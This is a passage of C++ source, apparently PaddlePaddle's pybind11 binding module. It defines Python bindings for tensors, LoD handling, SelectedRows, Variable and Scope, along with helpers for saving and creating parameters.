const PyNameVarBaseMap &state_dict) {
std::vector<std::shared_ptr<imperative::VarBase>> vec_res;
vec_res.reserve(state_dict.size());
for (auto &para : state_dict) {
PyObject *py_obj = para.second.ptr();
if (!py_obj || py_obj == Py_None) {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameter [%s] to save is None", para.first));
}
vec_res.emplace_back(
PyObjectCast<std::shared_ptr<imperative::VarBase>>(py_obj));
}
return vec_res;
}
static std::vector<std::string> inline GetNameList(
const py::handle &py_handle) {
std::vector<std::string> vec_res;
PyObject *py_obj = py_handle.ptr(); // get underlying PyObject
// Python None is not nullptr in C++!
if (!py_obj || py_obj == Py_None) {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameter list to save is None"));
}
if (PyList_Check(py_obj)) {
size_t len = PyList_GET_SIZE(py_obj);
vec_res.reserve(len);
const char *kNameField = "name";
for (size_t i = 0; i < len; ++i) {
PyObject *py_name =
PyObject_GetAttrString(PyList_GET_ITEM(py_obj, i), kNameField);
PADDLE_ENFORCE_NOT_NULL(py_name,
platform::errors::InvalidArgument(
"The name of parameter to save is None"));
vec_res.emplace_back(PyObjectCast<std::string>(py_name));
Py_DECREF(py_name);
}
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameters to save are not a list"));
}
return vec_res;
}
static void inline CreateVariableIfNotExit(
const py::handle &py_handle, const framework::Scope &scope,
const framework::Executor *exe = nullptr) {
std::vector<std::string> vec_res;
PyObject *py_obj = py_handle.ptr(); // get underlying PyObject
// Python None is not nullptr in C++!
if (!py_obj || py_obj == Py_None) {
PADDLE_THROW(
platform::errors::InvalidArgument("The parameter list to set is None"));
}
if (PyList_Check(py_obj)) {
size_t len = PyList_GET_SIZE(py_obj);
vec_res.reserve(len);
const char *kNameField = "name";
const char *kVarDescField = "desc";
for (size_t i = 0; i < len; ++i) {
PyObject *py_name =
PyObject_GetAttrString(PyList_GET_ITEM(py_obj, i), kNameField);
PADDLE_ENFORCE_NOT_NULL(py_name,
platform::errors::InvalidArgument(
"The name of parameter to set is None"));
auto para_name = PyObjectCast<std::string>(py_name);
Py_DECREF(py_name);
auto var = scope.FindVar(para_name);
if (var == nullptr) {
PADDLE_ENFORCE_NOT_NULL(exe,
platform::errors::InvalidArgument(
"Parameter not initialized. "
"Please set the argument [executor] to a "
"non-None value or run the startup program "
"first"));
PyObject *py_var_desc =
PyObject_GetAttrString(PyList_GET_ITEM(py_obj, i), kVarDescField);
PADDLE_ENFORCE_NOT_NULL(
py_var_desc, platform::errors::InvalidArgument(
"The var_desc of parameter to set is None"));
auto var_desc = PyObjectCast<framework::VarDesc>(py_var_desc);
Py_DECREF(py_var_desc);
var = const_cast<framework::Scope *>(&scope)->Var(para_name);
auto *tensor_temp = var->GetMutable<framework::LoDTensor>();
tensor_temp->Resize(phi::make_ddim(var_desc.GetShape()));
tensor_temp->mutable_data(
exe->GetPlace(),
framework::TransToPhiDataType(var_desc.GetDataType()));
}
}
} else {
PADDLE_THROW(platform::errors::InvalidArgument(
"The parameters to set are not a list"));
}
return;
}
static void AssertStaticGraphAndDygraphGradMakerNoDiff() {
std::set<std::string> ops;
for (auto &pair : framework::OpInfoMap::Instance().map()) {
bool has_static_grad_maker = (pair.second.grad_op_maker_ != nullptr);
bool has_dygraph_grad_maker =
(pair.second.dygraph_grad_op_maker_ != nullptr);
if (has_static_grad_maker ^ has_dygraph_grad_maker) {
bool has_kernel =
(framework::OperatorWithKernel::AllOpKernels().count(pair.first) > 0);
if (has_kernel) {
ops.insert(pair.first);
} else {
VLOG(5) << pair.first << " has no kernels, skip";
}
}
}
PADDLE_ENFORCE_EQ(ops.empty(), true,
platform::errors::Unimplemented(
"OperatorWithKernel [%s] have only static graph grad "
"maker or have only dygraph grad maker, which is not "
"allowed",
string::join_strings(ops, ',')));
}
#ifdef PADDLE_WITH_NCCL
static int GetNCCLVersion() {
#if NCCL_VERSION_CODE >= 2304
int ver;
PADDLE_ENFORCE_GPU_SUCCESS(platform::dynload::ncclGetVersion(&ver));
return ver;
#else
PADDLE_THROW(platform::errors::External(
"Cannot get NCCL version successfully when nccl version < 2.3.4"));
#endif
}
#endif
template <typename PlaceType>
static void TensorCopyFrom(framework::Tensor *dst, const framework::Tensor &src,
const PlaceType &place, int64_t batch_size) {
if (batch_size < 0) {
framework::TensorCopy(src, place, dst);
} else {
auto sliced = src.Slice(0, batch_size);
framework::TensorCopy(sliced, place, dst);
}
}
#ifdef PADDLE_WITH_AVX
PYBIND11_MODULE(core_avx, m) {
#else
PYBIND11_MODULE(core_noavx, m) {
#endif
BindImperative(&m);
BindEager(&m);
BindCudaStream(&m);
// Not used, just make sure cpu_info.cc is linked.
paddle::platform::CpuTotalPhysicalMemory();
paddle::memory::allocation::UseAllocatorStrategyGFlag();
AssertStaticGraphAndDygraphGradMakerNoDiff();
m.doc() = "C++ core of PaddlePaddle";
// using framework in this function. Since it is inside a function, it will
// not cause namespace pollution.
using namespace paddle::framework; // NOLINT
BindException(&m);
m.def("set_num_threads", &platform::SetNumThreads);
m.def("disable_signal_handler", &DisableSignalHandler);
m.def("clear_gradients",
[](std::vector<std::shared_ptr<imperative::VarBase>> param_list,
bool set_to_zero) {
for (auto param : param_list) {
param->ClearGradient(set_to_zero);
}
});
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
m.def("cudnn_version", &platform::DnnVersion);
m.def("gpu_memory_available", []() {
size_t available = 0;
size_t total = 0;
paddle::platform::GpuMemoryUsage(&available, &total);
return available;
});
#endif
#ifdef PADDLE_WITH_NCCL
m.def("nccl_version", &GetNCCLVersion);
#endif
m.def("is_cuda_graph_capturing", &platform::IsCUDAGraphCapturing);
#ifdef PADDLE_WITH_CUDA
py::class_<platform::CUDAGraph>(m, "CUDAGraph")
.def_static("begin_capture",
[](platform::CUDAPlace place, int mode) {
platform::BeginCUDAGraphCapture(
place, static_cast<cudaStreamCaptureMode>(mode));
})
.def_static("end_capture", &platform::EndCUDAGraphCapture)
.def("replay", &platform::CUDAGraph::Replay)
.def("reset", &platform::CUDAGraph::Reset)
.def("print_to_dot_files", &platform::CUDAGraph::PrintToDotFiles);
#endif
m.def("wait_device", [](const platform::Place &place) {
platform::DeviceContextPool::Instance().Get(place)->Wait();
});
m.def("from_dlpack", [](py::capsule *dltensor) {
DLManagedTensor *dmt = reinterpret_cast<DLManagedTensor *>(
PyCapsule_GetPointer(dltensor->ptr(), "dltensor"));
PADDLE_ENFORCE_NOT_NULL(
dmt, platform::errors::InvalidArgument(
"from_dlpack received an invalid capsule. "
"Note that a DLPack tensor can be consumed only once."));
PyCapsule_SetName(dltensor->ptr(), "used_dltensor");
DLTensor dl = dmt->dl_tensor;
framework::Tensor tensor;
if (dl.device.device_type == kDLCPU) {
paddle::framework::TensorFromDLPack(dl, &tensor);
}
#if defined(PADDLE_WITH_CUDA) || defined(PADDLE_WITH_HIP)
if (dl.device.device_type == kDLGPU) {
paddle::framework::TensorFromDLPack(dl, &tensor);
}
#endif
return tensor;
});
m.def("_create_loaded_parameter",
[](const py::handle &vec_var_list, const Scope &scope,
const Executor *executor) {
CreateVariableIfNotExit(vec_var_list, scope, executor);
});
m.def("save_op_version_info", [](framework::ProgramDesc &desc) {
framework::compatible::pb::OpVersionMap pb_vmap{desc.OpVersionMap()};
framework::compatible::SaveOpVersions(
framework::compatible::OpVersionRegistrar::GetInstance()
.GetVersionMap(),
&pb_vmap);
});
m.def("set_printoptions", [](const py::kwargs &kwargs) {
auto &print_opt = framework::PrintOptions::Instance();
if (kwargs.contains("precision")) {
print_opt.precision = kwargs["precision"].cast<int>();
}
if (kwargs.contains("threshold")) {
print_opt.threshold = kwargs["threshold"].cast<int>();
}
if (kwargs.contains("edgeitems")) {
print_opt.edgeitems = kwargs["edgeitems"].cast<int>();
}
if (kwargs.contains("linewidth")) {
print_opt.linewidth = kwargs["linewidth"].cast<int>();
}
if (kwargs.contains("sci_mode")) {
print_opt.sci_mode = kwargs["sci_mode"].cast<bool>();
}
VLOG(4) << "Set printoptions: precision=" << print_opt.precision
<< ", threshold=" << print_opt.threshold
<< ", edgeitems=" << print_opt.edgeitems
<< ", linewidth=" << print_opt.linewidth
<< ", sci_mode=" << print_opt.sci_mode;
});
m.def("broadcast_shape", [](const std::vector<int64_t> &x_dim,
const std::vector<int64_t> &y_dim) {
return phi::vectorize(operators::details::BroadcastTwoDims(
phi::make_ddim(x_dim), phi::make_ddim(y_dim), -1));
});
m.def(
"_append_python_callable_object_and_return_id",
[](py::object py_obj) -> size_t {
return paddle::operators::AppendPythonCallableObjectAndReturnId(py_obj);
});
m.def("_get_use_default_grad_op_desc_maker_ops",
[] { return OpInfoMap::Instance().GetUseDefaultGradOpDescMakerOps(); });
m.def("_get_all_register_op_kernels",
[](const std::string &lib) {
std::unordered_map<std::string, std::vector<std::string>>
all_kernels_info;
if (lib == "fluid" || lib == "all") {
auto &all_kernels =
paddle::framework::OperatorWithKernel::AllOpKernels();
for (auto &kernel_pair : all_kernels) {
auto op_type = kernel_pair.first;
std::vector<std::string> kernel_types;
for (auto &info_pair : kernel_pair.second) {
paddle::framework::OpKernelType kernel_type = info_pair.first;
kernel_types.emplace_back(
paddle::framework::KernelTypeToString(kernel_type));
}
all_kernels_info.emplace(op_type, kernel_types);
}
}
if (lib == "phi" || lib == "all") {
auto phi_kernels = phi::KernelFactory::Instance().kernels();
for (auto &kernel_pair : phi_kernels) {
auto op_type = phi::TransToFluidOpName(kernel_pair.first);
std::vector<std::string> kernel_types;
for (auto &info_pair : kernel_pair.second) {
framework::OpKernelType kernel_type =
framework::TransPhiKernelKeyToOpKernelType(info_pair.first);
auto kernel_type_str =
framework::KernelTypeToString(kernel_type);
if (all_kernels_info.count(op_type)) {
if (std::find(all_kernels_info[op_type].begin(),
all_kernels_info[op_type].end(),
kernel_type_str) ==
all_kernels_info[op_type].end()) {
all_kernels_info[op_type].emplace_back(kernel_type_str);
}
} else {
kernel_types.emplace_back(kernel_type_str);
}
}
if (!kernel_types.empty()) {
all_kernels_info.emplace(op_type, kernel_types);
}
}
}
return all_kernels_info;
},
py::arg("lib") = "all",
R"DOC(
Return the registered kernels in paddle.
Args:
lib (string): the library; one of 'phi', 'fluid', or 'all'.
)DOC");
// NOTE(zjl): ctest would load environment variables at the beginning even
// though we have not `import paddle.fluid as fluid`. So we add this API
// to enable eager deletion mode in unittest.
m.def("_set_eager_deletion_mode", &paddle::framework::SetEagerDeletionMode);
m.def("_set_fuse_parameter_group_size",
&paddle::framework::ir::SetFuseParameterGroupsSize);
m.def("_set_fuse_parameter_memory_size",
&paddle::framework::ir::SetFuseParameterMemorySize);
m.add_object("_cleanup",
py::capsule([]() { ScopePool::Instance().Clear(); }));
m.def("_set_paddle_lib_path", &paddle::platform::dynload::SetPaddleLibPath);
m.def("_promote_types_if_complex_exists",
&paddle::framework::PromoteTypesIfComplexExists);
py::class_<framework::Tensor> framework_tensor(m, "Tensor",
py::buffer_protocol());
g_framework_tensor_pytype =
reinterpret_cast<PyTypeObject *>(framework_tensor.ptr());
framework_tensor
.def("__array__",
[](framework::Tensor &self) { return TensorToPyArray(self); })
.def("_ptr",
[](const framework::Tensor &self) {
return reinterpret_cast<uintptr_t>(self.data());
})
.def("_is_initialized",
[](const framework::Tensor &self) { return self.IsInitialized(); })
.def("_get_dims",
[](const framework::Tensor &self) { return vectorize(self.dims()); })
.def("_set_dims",
[](framework::Tensor &self, const std::vector<int64_t> &dim) {
self.Resize(phi::make_ddim(dim));
})
.def("_set_layout",
[](framework::Tensor &self, const std::string &layout) {
self.set_layout(StringToDataLayout(layout));
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::CUDAPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::XPUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::CPUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::NPUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_float",
[](framework::Tensor &self, paddle::platform::MLUPlace &place) {
self.mutable_data<float>(place);
})
.def("_alloc_double",
[](framework::Tensor &self, paddle::platform::CPUPlace &place) {
self.mutable_data<double>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::CPUPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::XPUPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::CUDAPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self, paddle::platform::MLUPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_int",
[](framework::Tensor &self,
paddle::platform::CUDAPinnedPlace &place) {
self.mutable_data<int>(place);
})
.def("_alloc_float",
[](framework::Tensor &self,
paddle::platform::CUDAPinnedPlace &place) {
self.mutable_data<float>(place);
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::CPUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::XPUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::CUDAPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::CUDAPinnedPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::MLUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_clear", &framework::Tensor::clear)
.def("_mutable_data",
[](framework::Tensor &self, paddle::platform::NPUPlace &place,
paddle::framework::proto::VarType::Type type) {
return reinterpret_cast<uintptr_t>(
self.mutable_data(place, framework::TransToPhiDataType(type)));
})
.def("_copy_from", &TensorCopyFrom<paddle::platform::CPUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::XPUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::CUDAPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::NPUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::CUDAPinnedPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::MLUPlace>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("_copy_from", &TensorCopyFrom<paddle::platform::Place>,
py::arg("tensor"), py::arg("place"), py::arg("batch_size") = -1)
.def("set", SetTensorFromPyArray<paddle::platform::CPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::XPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::CUDAPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::NPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::IPUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::MLUPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false)
.def("set", SetTensorFromPyArray<paddle::platform::CUDAPinnedPlace>,
py::arg("array"), py::arg("place"), py::arg("zero_copy") = false,
R"DOC(
Set the data of Tensor on place with given numpy array.
Args:
array (numpy.ndarray): The data to set.
place (CPUPlace|CUDAPlace|XPUPlace|IPUPlace|CUDAPinnedPlace|NPUPlace|MLUPlace): The place where the
Tensor is to be set.
zero_copy (bool, optional): Whether to share memory with the input numpy array.
This parameter only works with CPUPlace. Default: False.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
)DOC")
.def("shape",
[](framework::Tensor &self) { return vectorize(self.dims()); },
R"DOC(
Return the shape of Tensor.
Returns:
list[int]: The shape of Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
print(t.shape()) # [5, 30]
)DOC")
.def("_to_dlpack",
[](framework::Tensor &self) {
DLPackTensor dlpack_tensor(self, 1);
DLManagedTensor *dmt = dlpack_tensor.ToDLManagedTensor();
auto capsule = py::capsule(
static_cast<void *>(dmt), "dltensor", [](PyObject *ptr) {
if (ptr) {
auto dltensor = new DLManagedTensor;
try {
dltensor = reinterpret_cast<DLManagedTensor *>(
PyCapsule_GetPointer(ptr, "used_dltensor"));
return;
} catch (...) {
dltensor = reinterpret_cast<DLManagedTensor *>(
PyCapsule_GetPointer(ptr, "dltensor"));
}
dltensor->deleter(dltensor);
}
});
return capsule;
})
.def("_set_float_element", TensorSetElement<float>)
.def("_get_float_element", TensorGetElement<float>)
.def("_set_double_element", TensorSetElement<double>)
.def("_get_double_element", TensorGetElement<double>)
.def("_place", [](framework::Tensor &self) { return self.place(); })
.def("_dtype",
[](framework::Tensor &self) {
return framework::TransToProtoVarType(self.type());
})
.def("_layout",
[](framework::Tensor &self) {
return DataLayoutToString(self.layout());
})
.def("_share_data_with", &framework::Tensor::ShareDataWith)
.def("__getitem__", PySliceTensor, py::return_value_policy::reference)
.def("__str__",
[](const framework::Tensor &self) {
std::stringstream ostr;
ostr << self;
return ostr.str();
}) /* ------ End of original Tensor ------ */
.def(
"__init__",
[](framework::Tensor &instance, const std::vector<std::vector<size_t>>
&recursive_sequence_lengths) {
LoD new_lod;
new_lod.reserve(recursive_sequence_lengths.size());
std::copy(recursive_sequence_lengths.begin(),
recursive_sequence_lengths.end(),
std::back_inserter(new_lod));
LoD new_offset_lod = ConvertToOffsetBasedLoD(new_lod);
PADDLE_ENFORCE_EQ(
CheckLoD(new_offset_lod, -1), true,
platform::errors::InvalidArgument(
"The provided recursive_sequence_lengths info is "
"invalid, "
"the LoD converted by recursive_sequence_lengths is %s",
new_lod));
new (&instance) framework::Tensor(new_offset_lod);
})
.def("__init__",
[](framework::Tensor &instance) {
new (&instance) framework::Tensor();
})
// We implement offset-based LoD in C++ while the Python API uses
// length-based LoD. So we renamed set_lod to
// set_recursive_sequence_lengths to avoid misuse.
// The discussion is here:
// https://github.com/PaddlePaddle/Paddle/issues/10855
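// (Worked example: length-based LoD [[2, 3]] corresponds to
// offset-based LoD [[0, 2, 5]], as the set_recursive_sequence_lengths
// docstring below also illustrates.)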
.def("set_lod",
[](framework::Tensor &self,
const std::vector<std::vector<size_t>> &lod) {
// the input lod is offset-based level-of-detail info
LoD new_lod;
new_lod.reserve(lod.size());
std::copy(lod.begin(), lod.end(), std::back_inserter(new_lod));
PADDLE_ENFORCE_EQ(
CheckLoD(new_lod, vectorize(self.dims()).front()), true,
platform::errors::InvalidArgument(
"The provided LoD is invalid, the LoD is %s", new_lod));
self.set_lod(new_lod);
},
py::arg("lod"), R"DOC(
Set LoD of the Tensor.
Args:
lod (list[list[int]]): The lod to set.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_lod([[0, 2, 5]])
print(t.lod()) # [[0, 2, 5]]
)DOC")
.def("set_recursive_sequence_lengths",
[](framework::Tensor &self, const std::vector<std::vector<size_t>>
&recursive_sequence_lengths) {
// the input recursive_sequence_lengths is length-based
// level-of-detail info
LoD new_lod;
new_lod.reserve(recursive_sequence_lengths.size());
std::copy(recursive_sequence_lengths.begin(),
recursive_sequence_lengths.end(),
std::back_inserter(new_lod));
LoD new_offset_lod = ConvertToOffsetBasedLoD(new_lod);
PADDLE_ENFORCE_EQ(
CheckLoD(new_offset_lod, vectorize(self.dims()).front()), true,
platform::errors::InvalidArgument(
"The provided recursive_sequence_lengths info is "
"invalid, "
"the LoD converted by recursive_sequence_lengths is "
"%s",
new_lod));
self.set_lod(new_offset_lod);
},
py::arg("recursive_sequence_lengths"), R"DOC(
Set LoD of the Tensor according to recursive sequence lengths.
For example, if recursive_sequence_lengths=[[2, 3]], which means
there are two sequences with length 2 and 3 respectively, the
corresponding lod would be [[0, 2, 2+3]], i.e., [[0, 2, 5]].
Args:
recursive_sequence_lengths (list[list[int]]): The recursive sequence lengths.
Returns:
None.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_recursive_sequence_lengths([[2, 3]])
print(t.recursive_sequence_lengths()) # [[2, 3]]
print(t.lod()) # [[0, 2, 5]]
)DOC")
.def("lod",
[](framework::Tensor &self) -> std::vector<std::vector<size_t>> {
// output the offset-based lod info
LoD lod = self.lod();
std::vector<std::vector<size_t>> new_lod;
new_lod.reserve(lod.size());
std::copy(lod.begin(), lod.end(), std::back_inserter(new_lod));
return new_lod;
},
R"DOC(
Return the LoD of the Tensor.
Returns:
list[list[int]]: The lod of the Tensor.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_lod([[0, 2, 5]])
print(t.lod()) # [[0, 2, 5]]
)DOC")
// Set above comments of set_lod.
.def("recursive_sequence_lengths",
[](framework::Tensor &self) -> std::vector<std::vector<size_t>> {
// output the length-based lod info
LoD lod = phi::ConvertToLengthBasedLoD(self.lod());
std::vector<std::vector<size_t>> new_lod;
new_lod.reserve(lod.size());
std::copy(lod.begin(), lod.end(), std::back_inserter(new_lod));
return new_lod;
},
R"DOC(
Return the recursive sequence lengths corresponding to the LoD
of the Tensor.
Returns:
list[list[int]]: The recursive sequence lengths.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_recursive_sequence_lengths([[2, 3]])
print(t.recursive_sequence_lengths()) # [[2, 3]]
)DOC")
.def("has_valid_recursive_sequence_lengths",
[](framework::Tensor &self) -> bool {
// Check that the lod info is valid and match the outermost
// dimension of the Tensor data
return CheckLoD(self.lod(), vectorize(self.dims()).front());
},
R"DOC(
Check whether the LoD of the Tensor is valid.
Returns:
bool: Whether the LoD is valid.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
t = fluid.Tensor()
t.set(np.ndarray([5, 30]), fluid.CPUPlace())
t.set_recursive_sequence_lengths([[2, 3]])
print(t.has_valid_recursive_sequence_lengths()) # True
)DOC")
.def("_as_type",
[](const framework::Tensor &self,
paddle::framework::proto::VarType::Type type) {
framework::Tensor dst;
if (self.IsInitialized() && self.numel() > 0) {
TransDataType(self, type, &dst);
}
return dst;
})
.def("_copy",
[](const framework::Tensor &self, const platform::Place &place) {
// follow fetch_op's implementation
framework::Tensor dst;
if (self.IsInitialized() && self.numel() > 0) {
TensorCopySync(self, place, &dst);
} else {
// Not copy, if the src tensor is empty.
dst.clear();
dst.Resize({0});
}
dst.set_lod(self.lod());
return dst;
#ifdef _WIN32
});
#else
})
.def(py::pickle(
[](const framework::Tensor &t) { // __getstate__
auto holder = t.Holder();
PADDLE_ENFORCE_EQ(platform::is_cpu_place(holder->place()), true,
platform::errors::PreconditionNotMet(
"Tensor is not on CPU."
"Now only Tensor on CPU can be serialized."));
auto *mmap_writer_allocation =
dynamic_cast<memory::allocation::MemoryMapWriterAllocation *>(
holder.get());
PADDLE_ENFORCE_NOT_NULL(
mmap_writer_allocation,
platform::errors::PreconditionNotMet(
"Tensor is not in shared memory."
"Now only Tensor on shared memory can be serialized."));
int type_idx = static_cast<int>(t.type());
return py::make_tuple(mmap_writer_allocation->ipc_name(),
mmap_writer_allocation->size(), type_idx,
vectorize(t.dims()), t.lod());
},
[](py::tuple t) { // __setstate__
if (t.size() != 5)
throw std::runtime_error("Invalid Tensor state!");
// 1. Create a new C++ instance
framework::Tensor tensor;
// 2. Rebuild Allocation
const std::string &ipc_name = t[0].cast<std::string>();
size_t size = t[1].cast<size_t>();
auto shared_reader_holder =
memory::allocation::RebuildMemoryMapReaderAllocation(ipc_name,
size);
// 3. Maintain global fd set
VLOG(3) << "Tensor ipc name: " << ipc_name;
memory::allocation::MemoryMapFdSet::Instance().Insert(ipc_name);
// 4. Rebuild Tensor
tensor.ResetHolderWithType(
shared_reader_holder,
static_cast<paddle::experimental::DataType>(t[2].cast<int>()));
tensor.Resize(phi::make_ddim(t[3].cast<std::vector<int>>()));
tensor.set_lod(t[4].cast<framework::LoD>());
return tensor;
}));
#endif
py::class_<phi::SelectedRows>(m, "SelectedRows")
.def("__init__",
[](phi::SelectedRows &instance) {
new (&instance) phi::SelectedRows();
})
.def("__init__",
[](phi::SelectedRows &instance, const std::vector<int64_t> rows,
const int64_t &height) {
new (&instance) phi::SelectedRows(rows, height);
})
.def("get_tensor",
[](phi::SelectedRows &self) { return self.mutable_value(); },
py::return_value_policy::reference)
.def("numel",
[](phi::SelectedRows &self) -> int64_t {
return self.value().numel();
})
.def("set_height", &phi::SelectedRows::set_height)
.def("height", &phi::SelectedRows::height)
.def("set_rows",
[](phi::SelectedRows &self, std::vector<int64_t> rows) {
#if !defined(PADDLE_WITH_CUDA) && !defined(PADDLE_WITH_HIP)
self.set_rows(rows);
#else
Vector<int64_t> new_rows(rows);
self.set_rows(new_rows);
#endif
})
.def("sync_index",
[](phi::SelectedRows &instance) { instance.SyncIndex(); })
.def("rows", [](phi::SelectedRows &self) {
auto rows = self.rows();
std::vector<int64_t> new_rows;
new_rows.reserve(rows.size());
std::copy(rows.begin(), rows.end(), std::back_inserter(new_rows));
return new_rows;
});
py::class_<Variable>(m, "Variable", R"DOC(Variable Class.
All parameters, weights and gradients are variables in Paddle.
)DOC")
.def(py::init<>())
.def("is_int", [](const Variable &var) { return var.IsType<int>(); })
.def("set_int",
[](Variable &var, int val) -> void { *var.GetMutable<int>() = val; })
.def("get_int", [](const Variable &var) -> int { return var.Get<int>(); })
.def("is_float", [](const Variable &var) { return var.IsType<float>(); })
.def("set_float",
[](Variable &var, float val) -> void {
*var.GetMutable<float>() = val;
})
.def("get_float",
[](const Variable &var) -> float { return var.Get<float>(); })
.def("get_tensor",
[](Variable &self) -> LoDTensor * {
return self.GetMutable<LoDTensor>();
},
py::return_value_policy::reference)
.def("get_bytes",
[](Variable &self) {
return py::bytes(*self.GetMutable<std::string>());
})
.def("set_string_list",
[](Variable &self, Strings str_list) {
*self.GetMutable<Strings>() = str_list;
})
.def("set_vocab", [](Variable &self,
Vocab vocab) { *self.GetMutable<Vocab>() = vocab; })
.def("get_string_tensor",
[](Variable &self) { return self.GetMutable<Strings>(); },
py::return_value_policy::reference)
.def("get_map_tensor",
[](Variable &self) { return self.GetMutable<Vocab>(); },
py::return_value_policy::reference)
.def("get_lod_rank_table",
[](Variable &self) { return self.GetMutable<LoDRankTable>(); },
py::return_value_policy::reference)
.def("get_selected_rows",
[](Variable &self) -> phi::SelectedRows * {
return self.GetMutable<phi::SelectedRows>();
},
py::return_value_policy::reference)
.def("get_lod_tensor_array",
[](Variable &self) { return self.GetMutable<LoDTensorArray>(); },
py::return_value_policy::reference)
.def("get_fetch_list",
[](Variable &self) { return self.GetMutable<FetchList>(); },
py::return_value_policy::reference)
#if defined(PADDLE_WITH_NCCL) || defined(PADDLE_WITH_RCCL)
.def("get_communicator",
[](Variable &self) -> platform::Communicator * {
return self.GetMutable<platform::Communicator>();
},
py::return_value_policy::reference)
#endif
.def("get_reader",
[](Variable &self) -> framework::ReaderHolder * {
PADDLE_ENFORCE_EQ(
self.IsType<framework::ReaderHolder>(), true,
platform::errors::InvalidArgument(
"The variable is not type of ReaderHolder."));
return self.GetMutable<framework::ReaderHolder>();
},
py::return_value_policy::reference)
.def("get_scope",
[](Variable &self) -> Scope * {
auto scope_vec =
self.GetMutable<std::vector<framework::Scope *>>();
PADDLE_ENFORCE_GT(
scope_vec->size(), 0,
platform::errors::InvalidArgument(
"The size of scope_vec should be greater than 0"));
return scope_vec->front();
},
py::return_value_policy::reference)
.def("set_scope", [](Variable &self, Scope &scope) {
auto scope_vec = self.GetMutable<std::vector<framework::Scope *>>();
scope_vec->emplace_back(&scope);
});
BindReader(&m);
py::class_<Scope>(m, "_Scope", R"DOC(
Scope is an association of a name to Variable. All variables belong to Scope.
Variables in a parent scope can be retrieved from local scope.
You need to specify a scope to run a Net, i.e., `exe.Run(&scope)`.
One net can run in different scopes and update different variables in the
scope.
You can create var in a scope and get it from the scope.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# create tensor from a scope and set value to it.
param = scope.var('Param').get_tensor()
param_array = np.full((height, row_numel), 5.0).astype("float32")
param.set(param_array, place)
)DOC")
.def("_remove_from_pool",
[](Scope &self) { ScopePool::Instance().Remove(&self); })
.def("var",
[](Scope &self, const std::string &name) -> Variable * {
return self.Var(name);
},
py::arg("name"),
R"DOC(
